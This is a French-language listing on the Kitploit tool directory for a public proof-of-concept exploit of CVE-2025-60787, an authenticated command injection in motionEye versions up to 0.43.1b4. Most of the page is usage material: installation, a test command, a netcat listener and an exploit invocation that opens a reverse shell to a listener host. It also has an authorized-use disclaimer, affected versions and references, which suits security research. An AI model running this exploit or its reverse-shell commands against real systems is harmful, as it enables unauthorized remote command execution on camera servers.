Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-60787 — CVE-2025-60787 PoC RCE par injection de commande authentifiée motionEye | Kitploit
Outils/GitHubGitHub/ozcanpng/cve-2025-60787
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed Teaming
GitHubozcanpng/cve-2025-60787

CVE-2025-60787

CVE-2025-60787 PoC RCE par injection de commande authentifiée motionEye

Voir le dépôt
2il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-60787 — motionEye RCE authentifié

PoC d'injection de commande authentifiée pour CVE-2025-60787. motionEye v0.43.1b4 et versions antérieures écrit des valeurs de configuration de caméra contrôlées par l'utilisateur, telles que image_file_name, dans la configuration Motion sans sanitisation suffisante, permettant l'exécution de commandes lorsque la valeur est traitée.

Pour les tests et la recherche autorisés uniquement. Ne pas utiliser contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de tester.


Ce qu'il fait

root@kitploit:~
Signed API request -> camera config update -> image_file_name injection -> snapshot trigger -> command execution
  1. Valide la cible et détecte motionEye.
  2. Génère des requêtes API motionEye signées en utilisant le nom d'utilisateur et le hash du mot de passe configurés.
  3. Lit la configuration de la caméra via /config/list/.
  4. Injecte une commande dans le paramètre image_file_name de la caméra.
  • Active les images fixes / instantanés manuels si nécessaire.
  • Déclenche /action/<camera_id>/snapshot/ pour que motionEye traite le nom de fichier injecté.
  • Restaure éventuellement la configuration originale de la caméra.

  • Captures d'écran

    Configuration du reverse shell

    Configuration du reverse shell

    Injection et déclenchement de configuration

    Injection et déclenchement de configuration

    Shell reçu

    Shell reçu


    Installation

    root@kitploit:~
    git clone https://github.com/ozcanpng/CVE-2025-60787.git
    cd CVE-2025-60787
    pip install -r requirements.txt
    

    Utilisation

    Preuve de commande sécurisée

    root@kitploit:~
    python3 CVE-2025-60787.py \
      --target http://127.0.0.1:8765 \
      --user admin \
      --password-hash HASH \
      --cmd 'id > /tmp/motioneye_rce'
    

    Reverse shell

    D'abord lancer un écouteur :

    root@kitploit:~
    rlwrap nc -lvnp 4444
    

    Ensuite exécuter :

    root@kitploit:~
    python3 CVE-2025-60787.py \
      --target http://127.0.0.1:8765 \
      --port 8765 \
      --user admin \
      --password-hash HASH \
      --reverse-shell \
      --lhost 10.10.16.53 \
      --lport 4444
    

    Options utiles :

    root@kitploit:~
    --camera-id N      Camera ID to modify (default: 1)
    --restore          Restore the original camera configuration after triggering
    --dry-run          Build signed requests without modifying the target
    --debug            Print canonical signed paths, bodies and signatures
    --no-trigger       Update config without triggering a snapshot
    --verify-tls       Verify HTTPS certificates
    --yes              Skip reverse-shell confirmation prompt
    

    Affecté

    ProduitVersion affectéeAccès requisImpact
    motionEye<= 0.43.1b4Accès admin/API authentifiéExécution de commandes système en tant qu'utilisateur du processus motionEye/Motion

    Le privilège résultant dépend de la façon dont motionEye est déployé. Dans les conteneurs ou les images de laboratoire exécutant le service en tant que root, l'exécution de commande peut aboutir en tant que root.


    Remarques

    • Le PoC attend la valeur/hash du mot de passe motionEye stocké car cette valeur est utilisée comme clé de signature pour les requêtes API héritées.
    • Le champ injecté est image_file_name.
    • Utilisez --restore pendant les tests pour rétablir la configuration originale de la caméra après exploitation.
    • Préférez --cmd pour une validation sécurisée avant de tenter un reverse shell.

    Références

    • NVD — CVE-2025-60787
    • GitHub Security Advisory — GHSA-j945-qm58-4gjx
    • motionEye project

    Auteur

    ozcanpng — github.com/ozcanpng — ozcanpng.dev

    Télécharger l’outil